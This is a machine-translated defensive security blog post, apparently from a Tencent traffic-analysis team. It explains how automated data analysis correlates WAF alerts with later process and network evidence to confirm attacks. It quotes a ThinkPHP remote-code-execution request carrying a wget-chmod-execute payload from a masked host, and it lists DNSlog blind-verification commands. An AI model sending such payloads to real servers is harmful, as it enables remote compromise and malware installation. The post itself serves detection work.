当前位置：网站首页>Threat discovery under automated data analysis

Threat discovery under automated data analysis

2022-06-24 05:22:00 【Tencent Security Emergency Response Center】

background

I don't remember how long ago , Probably 2020 year 9 month 3 Number 15 spot 37 branch 25 second 181 MS has written an article about data analysis in the process of information collection （ Link to the original text ）, Some readers may ask , Why do I remember such a precise time so clearly , because — by — I — blind — Ed — Of . Get down to business , Here is the focus of this article , in general , These two articles are actually about data analysis . An analysis of the data used in the attack process , This article is a sister to the previous one , Then focus on the data analysis used in safe operation , That is, enterprise defense ;

break the ice ！

Before starting the article , Let's start with an attack HTTP package （ Source order IP And other information are omitted ）, Readers might as well think about it first , From this HTTP What useful information can we get or restore in the package ？

GET /index.php?s=/index/\thinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Host:x.x.x.x

In general , Some readers may focus on HTTP To analyze the contents of the package , For example, attack tactics and so on , For some experienced safety engineers, it can even be pointed out that this is for thinkPHP A loophole in the . But actually , In fact, there are more information hidden under the iceberg , And want to dig the information under the iceberg , We first need to reason about all possible paths according to the evolution process , I simplified it to the following figure ：

in general , The information we get falls into two categories , The direct message is this HTTP Basic information about the package , Including time 、 Attack methods, etc ; The indirect information covers all possible information in the subsequent evolution of the attack , Include process 、 process 、 Communications, etc .

Why do that ？ Because in the actual operation, we find that it is difficult to complete the closed-loop alarm by simply relying on direct information or simply relying on indirect information . For example, take the direct information of the attack as an example , We WAF There are countless alarms like the above every day , Basically no operability . However, if we use automatic data analysis for direct and indirect information, we can filter false positives at the same time , Realize high accuracy alarm .

so what ？

Just now we mentioned why we should do automated data analysis , I believe readers are more curious about how to do it , My team is the traffic analysis team , Therefore, using traffic to realize automatic data analysis is a major focus of this paper .

Next, we will still use the example just now to illustrate , First , The first question to think about is ：“ Why can't direct information form an effective alarm ？”, Simply put, we don't know whether it has been successfully executed , So here we move the perspective back , If there is indirect information to support the successful implementation , So this actually forms a complete chain of evidence . It's like your ex girlfriend was proposed on Tanabata , You may want to know whether it is successful , Although they are not present, you can decide whether they have a wedding in the near future 、 Whether the marriage proposal is successful or not depends on whether the marriage certificate is obtained . ad locum , The author simply combs the following events that can be used as evidence in the case just now ：

● The server executes the download file command

● The server is or has downloaded the file

● The server is executing or has executed the file

● External communication exists during the execution of this file

Sum up , If any of the above behaviors can be confirmed on the basis of the attack behavior , Can we confirm that the attack was successful . Besides , The benefits of doing so are obvious , Using data analysis instead of simply using traditional rules can not only reduce the maintenance of rules , Improve versatility , At the same time, it is more accurate in alarm operation .

How do you do it? ？

Specific application process , It's kind of like putting an elephant in a refrigerator , The first step is to extract the complete command string , And can realize the simple analysis of the command string ; The second step is to modify the file （ If you have any ） Perform sandbox analysis , At the same time, it can extract relevant rules according to the current attack type , And issue the extracted rules to the corresponding safety equipment ; The third step is to use NTA and EDR、 The scanner correlates the data of each security device , Realize alarm operation ;

The first step is to extract the complete command string , There are many ways , The first is more traditional , The idea is also relatively simple , Yes, complete HTTP Request to parse , Split the parameters and parameter values in the request into dictionary forms （ Whether it's get、post Content or cookie Content ）, After that, common commands for parameter values are extracted through corresponding regularization , It's a simple way , However, the problem of relative missing and false positives is more prominent ; The second way is to implement many similar requests at the same time , While containing malicious requests , It also contains normal requests for this interface , The extraction of command string is realized by using the difference between normal request and attack request . There are relatively few false positives in this way , But the cost is relatively high .

wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp

After the extracted command string through the above steps , The following processing is relatively simple , There are also two ways , First, use. python Its own syntax parsing library shelx, Use it directly split Methods lexical analysis of commands , Of course, you can also directly use regularization for pattern matching , Then extract URL、 Orders, etc .

['wget', 'http://x.x.x.x/bins/bom.x86', '-O', '/tmp/.bom;', 'chmod', '777', '/tmp/.bom;', '/tmp/.bom', 'thinkphp']

The second step is to download the file remotely according to the string command , At the same time, use sandboxes to analyze executable files , Extract the... Corresponding to the file IOC, At the same time, it can also issue corresponding detection rules to various security devices .

The third step is relatively simple , The main thing is to get the relevant process 、 Network and other relevant data , At the same time, some requests requiring secondary confirmation can also be submitted to the scanner , Finally, through the similar time 、 Confirm whether the association is successful by command similarity and other methods , Of course, graph correlation operation can also be used here to realize correlation , I will not go into details here .

To use ！

In fact, I have passed this small case here , You can basically understand the idea of data analysis , Of course, there are different scenarios , The correlation and output of data analysis are naturally different , To make a long story short , The idea is to analyze and reason all the processes of the attack behavior . Last , On the basis of what has been mentioned above , Take a small case of practical application of data analysis .

Case a

Through data analysis, we can obtain the data for blind print verification dnslog domain name 、ip Etc , Used to feed back security policies . For example, the following modes are commonly used in blind printing ：

nslookup  ad323xzxs[.]qq[.]com
ping  ad323xzxs[.]qq[.]com
dig  ad323xzxs[.]qq[.]com
dig ad323xzxs @x.x.x.x
curl http://qq[.]com/i/c204f5/5dig/hgl5/
curl ad323xzxs[.]qq[.]com
......

We first get all the domain names stored in the database through the first step , After that, the root domain name used by the attacker for authentication can be obtained by processing according to different modes , For example nslookup ad323xzxs.qq.com This model , You can disassemble all domain names to get the root domain name of all domain names , after group by To deal with , Finally, we can get the result simply through quantitative judgment , And the domain names finally obtained can be fed back into the strategy . Here's the picture ：

Case 2

Through data analysis, the request for suspected vulnerabilities is submitted to the scanner for scanning or the spread of new vulnerabilities is found . As mentioned above, the normal request and the band paylaod The request can be attacked payload, meanwhile , After this step, you can actually get the location of normal requests and injection points . And we can according to paylaod To rate the likelihood of the vulnerability , For example, if there is the behavior of dragging the library, you can give a high score , Finally, the request for high scores is directly submitted to the scanner for secondary scanning . Of course, the same principle applies to the discovery of new vulnerability propagation , But the specific treatment is slightly different .

End ！

Readers see here , The end of this paper , Welcome to communicate through message or comment .

About the aegis traffic security analysis team

Aegis traffic security analysis team belongs to Tencent Security Platform Department , Relying on Tencent Security Platform Department's 15 years of security experience, we will build a company level security system , Focus on traffic based attack detection 、 Intrusion detection 、 Construction and landing of traffic blocking and Threat Intelligence , Constantly mining security risks in traffic and broadening application scenarios , Combined with big data 、AI And other cutting-edge technologies , Build network traffic defense system in depth .

原网站

版权声明
本文为[Tencent Security Emergency Response Center]所创，转载请带上原文链接，感谢
https://yzsam.com/2021/08/20210816233826229K.html